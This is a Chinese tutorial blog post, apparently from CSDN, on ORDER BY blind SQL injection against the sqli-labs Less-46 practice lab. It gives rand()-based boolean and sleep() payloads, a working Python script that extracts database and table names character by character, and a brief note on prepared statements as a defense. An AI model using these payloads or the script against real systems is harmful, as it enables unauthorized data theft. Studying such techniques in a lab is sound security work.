SQL注入之order by脚本盲注

已于 2024-02-26 20:59:56 修改
阅读量861 收藏 15
点赞数 20
分类专栏: 网络安全 文章标签: 数据库 网络安全 mysql python3.11 php
于 2024-02-26 19:33:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64620936/article/details/136304104
版权
文章讲述了在SQL注入中利用orderby特性进行字符识别的技巧,并提供了Python脚本示例。重点讨论了PDO预编译和PHP防御措施来防止此类攻击。
摘要由CSDN通过智能技术生成

一、环境

还是用上次搭建的sql-labs靶机环境

搭建sql注入环境

二、什么是order by盲注

在有的时候我们进行sql注入时,源码的查询语句后面为order by;
众所周知,order by 后面接的字段或者数字不一样,那么这个数据表的排序就会不同;
我们恰恰就可以利用这点来进行注入,
对查询的数据的每个字符的ascii码进行比较判断(其判断返回值只会为True(真)和False(假)),
将其返回值的放入rand()函数中  对数据表进行排序,
当显示出现变化时则可以判断出我们所要数据的字符,在对其进行拼接即可,
对此盲注方法我们采用脚本来快速实现

三、实现

环境为sql-labs靶机的第46关

查看源码得知要让我们选择字段进行排序

以1(id)、2(username)、3(password)字段为例,查看效果

可以看到不同字段的顺序是不同的,根据这个原理,我们可以通过上面我说的用rand()实现一个盲注,效果如下

?sort=rand(ascii(substr((select database()),1,1))>114)

显然,转为ASCII码来比较真假,为真时第一列为admin3,为假时第一列为Dumb,那么根据此现象,我们就可以对其写一个脚本,帮助我们快速实现注入

我们通过第一个用户字段进行爬取判断,为真时是admin3
编写一份爆库名和表名的注入脚本(注释在里面)

import requests
import time
from bs4 import BeautifulSoup

"""
查表名
查列名
查具体字段内容
if(ascii(substr(database(),1,1))>100,%20sleep(3),%200)--+
if(ascii(substr(database(),1,1))>110, sleep(3), 0)
"""


def inject_database(url):
    """
    使用二分法查询  aaaaaaaaaaaaaaaaaaaa
    """
    name = ''
    for i in range(1, 50):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            # 爆库名
            payload = "rand(ascii(substr((select database()),%d,1))>%d)" % (i, mid)
            # 爆表名
            # payload = "rand(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = database()), %d, 1))>%d)" % (i, mid)
            # 将payload作为参数传递给请求
            params = {"sort": payload}
            # start_time = time.time()
            # 发送一个GET请求到指定的URL,带上构造好的参数
            r = requests.get(url, params=params)
            # 获取请求得到的HTML响应内容
            html = r.text
            # 使用BeautifulSoup解析HTML内容
            soup = BeautifulSoup(html, 'html.parser')
            # 从HTML中找到第二个<td>标签,并获取其文本内容,这似乎是用来获取用户名
            getusername = soup.find_all('td')[1].text

            # end_time = time.time()
            # 检查获取的用户名是否为'admin3',如果是,则更新low的值
            if getusername == 'admin3':
                low = mid + 1
            # 如果获取的用户名不是'admin3',则更新high的值
            else:
                high = mid
            # 更新中间值,继续二分查找
            mid = (low + high) // 2
        if mid == 32:
            break
        # 将找到的字符添加到name中
        name += chr(mid)
        # 打印出当前已经找到的数据库名称
        print(name)


if __name__ == "__main__":
    url = 'http://127.0.0.1/sqli-labs-php7-master/Less-46/'
    inject_database(url)

先爆库名:security

再爆表名:emails,referers,uagents,users

我们爆出了4张表,很明显users表是很重要的一张,后续想要什么数据即可根据需求修改脚本中的payload即可

四、如何防御

防御机制:

PDO预编译:

模拟编译:

PHP的底层把单引号自动转译,但是遇见宽字节会失效,但是遇见真实的预编译这里就不会失效,

真实编译:

如果在预编译的形势下,还是用拼接传递参数,那么预编译不会生效,order by后面本身会存在注入点,但是预编译情况下,没有办法在order by后面实现预编译,如果想功能正常,还是得用拼接的方法去使用,这种情况下也有可能实现sql注入

气泡水。
关注
  • 20
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者学院-SQL注入漏洞测试(布尔盲注
weixin_42939822的博客
03-20 4348
决心按部就班、由浅入深地去剖析下sql注入题目提供的靶场环境,完善自身解题思路。本题靶场环境比较简单、也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入题目。废话不多说啦,先附上题目链接:https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe*
SQL注入(查询方式及盲注
qi_SJQ_的博客
11-09 1605
很多注入会出现无回显的情况,其中不回显的原因可能是SQL语句查询方式的问题导致,这个时候我们需要用到相关的报错或盲注进行后续操作。 sql语句增删改查: 比如:insert注入可以用于用户注册时插入到数据库中。 ...
SQL注入进阶-order by注入
AkangBoy的博客
11-06 8861
本文从order by原理简介开始,详细描述了order by注入原理以及多种注入姿势,包含order by union select注入、order by if()注入、order by sleep()注入、order by报错注入。
SQL注入实战
qq_22792465的博客
07-02 1060
id=1 union select 1,2,3,4,5,concat(table_name),7,version(),9,10 from information_schema.tables where table_schema='techmarthk_data'--+第二条payload不需要进行url编码即可执行延时,如若进行编码则不会延时。注入为orderBy注入,将orderby更改为id测试时并不能造成报错回显故不能当注入点。经过测试可知共14列,orderBy=15时报错,由于列名可控?
针对ORDER BY子句的SQL注入
最新发布
qq_69100706的博客
07-30 297
在CTF(Capture The Flag)竞赛中,针对ORDER BY子句的SQL注入是一种利用Web应用程序逻辑漏洞的技术,通常在应用程序对数据库查询结果排序时出现。当应用程序没有正确清理或参数化用户输入,并将其直接用于ORDER BY子句时,攻击者可以注入额外的SQL代码,从而控制查询结果的排序方式,甚至执行更复杂的SQL操作。
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
利用order by 进行盲注
aiquan9342的博客
10-21 225
0x01 利用场景 登录代码: $username = $_POST['username']; $password = $_POST['password']; if(filter($username)){ //过滤括号 }else{ $sql="SELECT * FROM admin WHERE username='".$username."'"; ...
SQL注入ORDER BY注入
m0_74834253的博客
02-22 2553
使用ORDER BY语句不仅支持对单列数据的排序,还支持对数据表中多列数据的排序。需要注意的是这样注入的效率很低,还是应该先考虑其他的注入方式最后在采用时间盲注order by还支持多个字段自定义排序,通过逗号隔开,但只能在数字之间进行自定义排序,若选择字符类型则会根据第一个列名的排序规则进行排序。为true或者false时,排序结果是不同的,但因为序列相同所以就可以使用rand()函数进行盲注了。
mysql bool盲注_mysql order by基于时间的盲注
weixin_36166558的博客
01-27 134
order by后面的注入,一般先尝试报错注入,无报错的时候可以通过rand(ture)和rand(false)来进行bool型盲注,但是今天遇到完全没有数据回显的(也就是数据库中没有数据)情况,这就比较麻烦了。记录一下sql语句参考文章:https://www.cnblogs.com/babers/p/7397525.htmlhttps://www.cnblogs.com/Vinson404/p...
全手工SQL注入脚本整理
传说中的蒙面大侠
01-17 1427
        1.判断是否有注入;and 1=1 ;and 1=2          2.初步判断是否是mssql ;and user>0   3.注入参数是字符and [查询条件] and =   4.搜索时没过滤参数的and [查询条件] and %25=   5.判断数据库系统   ;and (select count(*) from sysob
SQL注入order by ,limit与宽字节注入
Miracle_ze的博客
08-09 958
定义:正常情况下GPC开启或者使用addslashes函数过滤GET或POST提交的参数时,我们测试输入的’,就会被转义为’,无法成功闭合或者说逃逸。一般这种情况是不存在注入可能的,但是有一种情况除外,就是当后台数据库编码格式为GBK时,可以添加字符欺骗转义函数,'等不被转义。适用情形:(1)数据库的编码格式为GBK;(2)在PHP中,通过iconv()进行编码转换。原理:加入字节与\构成GBK编码,实现单引号和双引号逃逸。.........
sqli-labs盲注脚本
06-24
sqli-labs盲注脚本 sqli-labs盲注脚本 sqli-labs盲注脚本
sql注入测试脚本
03-17
sql注入常用的测试语句大全,方便进行渗透测试和sql注入测试。
sql盲注之报错注入(附自动化脚本)
xiaoi123的博客
12-29 4747
作者:__LSA__ 0x00 概述 渗透的时候总会首先测试注入,sql注入可以说是web漏洞界的Boss了,稳居owasp第一位,普通的直接回显数据的注入现在几乎绝迹了,绝大多数都是盲注了,此文是盲注系列的第一篇,介绍盲注中的报错注入。 0×01 报错注入原理 其实报错注入有很多种,本文主要介绍几种常见的报错方法,有新姿势后续再更新。 1. Duplicate
SQL注入ORDER BY注入_order by 后面的变量 sql注入
m0_60721695的博客
04-08 739
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
SQL盲注脚本
ma963852的博客
12-14 854
#coding:utf-8 import requests import time ip_port="127.0.0.1:80" data={ "login":"bee", "password":"bug", "security_level":"0", "form":"submit" } urlLogin="http://%s/login.php"%ip_port session=requests.session() resp=session.post(urlLogin,.
sql盲注脚本
、moddemod
06-14 1008
# moddemod # 2019/6/13 # 8:23 # PyCharm import requests import re """ base_url = "http://127.0.0.1/sqli-labs/Less-8/?id=1" """ base_url = "http://127.0.0.1/sqli-labs/Less-8/?id=1" class Blind(object...
SQL 注入脚本学习笔记
二进制的博客
10-11 1362
什么是SQL注入,如何理解SQL注入是一种将sql代码添加到输入参数中,传递到sql服务器解析并执行的一种攻击手法expxxx.action?id=1 此时可以在id后加入sql语句进行注入 xxx.action?id=-1 or 1=1 此时查询的信息就是所有的信息SQL注入是怎么产生的? web开发人员无法保证所有的输入都已经过滤 攻击者利用发送给sql服务器的输入数据构造可执行的sql代
SQL盲注脚本MySQL
卧龙居
11-13 1311
#coding:utf-8 import urllib.request import json """ SQL盲注脚本,适用于MYSQL数据库;CTF 0~1 SQL注入第二题 """ class SqlBlindInjection(object): def __init__(self): self.url = "http://eci-2zej1goyn9jgugq1cnzn.cloudeci1.ichunqiu.com/login.php" #条件为真的返回值.
sql注入order by
04-30
SQL注入中,"ORDER BY"是一种常用的攻击手法之一。它通常用于利用应用程序对SQL查询结果的排序方式进行操作,从而获取额外的信息或者绕过安全措施。 "ORDER BY"子句用于对查询结果进行排序。它可以按照一个或多个列进行排序,并指定升序(ASC)或降序(DESC)。在正常情况下,应用程序会根据用户的选择或者默认设置来构建"ORDER BY"子句。 然而,在SQL注入攻击中,攻击者可以通过构造恶意输入来修改"ORDER BY"子句,以达到他们的目的。以下是一些常见的SQL注入中的"ORDER BY"攻击技巧: 1. 利用错误消息:攻击者可以通过在"ORDER BY"子句中使用不存在的列名或者无效的排序方式来触发错误消息。这些错误消息可能会泄露数据库的结构信息,如表名、列名等。 2. 盲注攻击:攻击者可以通过使用布尔逻辑来判断某个条件是否成立,从而逐位地猜测查询结果。例如,通过使用"ORDER BY"子句来判断某个列的值是否大于或小于某个特定值。 3. 时间延迟攻击:攻击者可以通过在"ORDER BY"子句中使用时间延迟函数,如SLEEP()或BENCHMARK(),来延长查询的执行时间。这可以用于判断某个条件是否成立,或者用于拖慢应用程序的响应时间。 为了防止SQL注入攻击中的"ORDER BY"攻击,开发人员应该采取以下措施: 1. 使用参数化查询或预编译语句:这可以防止攻击者通过注入恶意代码来修改"ORDER BY"子句。 2. 输入验证和过滤:对用户输入进行严格的验证和过滤,确保只允许合法的输入。 3. 最小权限原则:将数据库用户的权限限制在最小必需的范围内,以减少攻击者可以利用的漏洞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值